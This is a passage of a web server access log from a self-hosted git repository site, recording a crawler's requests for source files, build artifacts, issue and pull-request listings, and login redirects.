"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/README_WINDOWS.md" +[17/Feb/2026:19:39:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/test_run.bat?display=rendered" [Client 74.7.227.38] [Length 11044] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/test_run.bat" +[17/Feb/2026:19:39:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/test_run.bat?display=source" [Client 74.7.227.38] [Length 12254] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/test_run.bat" +[17/Feb/2026:19:39:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg?display=rendered" [Client 74.7.227.38] [Length 10919] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg" +[17/Feb/2026:19:39:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg?display=rendered" [Client 74.7.227.38] [Length 10916] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg" +[17/Feb/2026:19:39:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg?display=rendered" [Client 74.7.227.38] [Length 10916] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg" +[17/Feb/2026:19:39:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg?display=rendered" [Client 74.7.227.38] [Length 10919] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg" +[17/Feb/2026:19:39:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg?display=rendered" [Client 74.7.227.38] [Length 10916] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg" +[17/Feb/2026:19:39:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg?display=rendered" [Client 74.7.227.38] [Length 10920] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg" +[17/Feb/2026:19:39:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10012] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:39:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/install.sh" [Client 74.7.227.38] [Length 14979] [Gzip 4.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol" +[17/Feb/2026:19:39:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10064] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" +[17/Feb/2026:19:39:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10240] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:39:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/index.html?display=rendered" [Client 74.7.227.38] [Length 10908] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/index.html" +[17/Feb/2026:19:39:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/index.html?display=source" [Client 74.7.227.38] [Length 21826] [Gzip 6.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/index.html" +[17/Feb/2026:19:39:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10005] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:19:39:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/pip3?display=rendered" [Client 74.7.227.38] [Length 11215] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/pip3" +[17/Feb/2026:19:39:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10020] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&sort=oldest&state=open&type=all" +[17/Feb/2026:19:39:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10190] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:19:39:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/python3?display=rendered" [Client 74.7.227.38] [Length 11220] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/python3" +[17/Feb/2026:19:39:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10208] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:39:15 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresPatrol/install.sh" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/install.sh" +[17/Feb/2026:19:39:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresPatrol/install.sh" +[17/Feb/2026:19:39:16 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresPatrol/install.sh" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/install.sh" +[17/Feb/2026:19:39:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresPatrol/install.sh" +[17/Feb/2026:19:39:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresPatrol/install.sh" [Client 74.7.227.38] [Length 9835] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/install.sh" +[17/Feb/2026:19:39:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/install.sh?display=rendered" [Client 74.7.227.38] [Length 11123] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/install.sh" +[17/Feb/2026:19:39:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/install.sh?display=source" [Client 74.7.227.38] [Length 14992] [Gzip 4.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/install.sh" +[17/Feb/2026:19:39:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresPatrol/install.sh" [Client 74.7.227.38] [Length 3545] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/install.sh" +[17/Feb/2026:19:39:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/PostgresPatrol/install.sh" [Client 74.7.227.38] [Length 15348] [Gzip 8.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/install.sh" +[17/Feb/2026:19:39:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresPatrol/install.sh" [Client 74.7.227.38] [Length 983] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/install.sh" +[17/Feb/2026:19:39:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10034] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:39:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10002] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:39:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10178] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:39:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 9985] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&milestone=-1&state=all&type=all" +[17/Feb/2026:19:39:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10147] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&project=-1&state=all&type=all" +[17/Feb/2026:19:39:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10179] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&project=-1&state=open&type=all" +[17/Feb/2026:19:39:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10006] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&milestone=-1&state=open&type=all" +[17/Feb/2026:19:39:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/.vscode/c_cpp_properties.json?display=source" [Client 74.7.227.38] [Length 11583] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/.vscode/c_cpp_properties.json" +[17/Feb/2026:19:39:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/.vscode/c_cpp_properties.json?display=source" [Client 74.7.227.38] [Length 11585] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/.vscode/c_cpp_properties.json" +[17/Feb/2026:19:39:24 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresPatrol/install.sh" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/install.sh" +[17/Feb/2026:19:39:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresPatrol/install.sh" +[17/Feb/2026:19:39:25 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresPatrol/install.sh" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/install.sh" +[17/Feb/2026:19:39:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresPatrol/install.sh" +[17/Feb/2026:19:39:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9991] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:39:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10233] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:19:39:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10060] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:19:39:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10061] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=open&type=all" +[17/Feb/2026:19:39:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/struct.pyc?display=rendered" [Client 74.7.227.38] [Length 11153] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/struct.pyc" +[17/Feb/2026:19:39:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/struct.pyc?display=rendered" [Client 74.7.227.38] [Length 11153] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/struct.pyc" +[17/Feb/2026:19:39:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/struct.pyc?display=rendered" [Client 74.7.227.38] [Length 11154] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/struct.pyc" +[17/Feb/2026:19:39:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/PKG-00.toc?display=source" [Client 74.7.227.38] [Length 69558] [Gzip 17.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/PKG-00.toc" +[17/Feb/2026:19:39:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz?display=rendered" [Client 74.7.227.38] [Length 11129] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz" +[17/Feb/2026:19:39:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/EXE-00.toc?display=source" [Client 74.7.227.38] [Length 71123] [Gzip 17.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/EXE-00.toc" +[17/Feb/2026:19:39:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/PYZ-00.toc?display=source" [Client 74.7.227.38] [Length 44333] [Gzip 15.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/PYZ-00.toc" +[17/Feb/2026:19:39:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10021] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:39:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10224] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&project=-1&state=closed&type=all" +[17/Feb/2026:19:39:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr 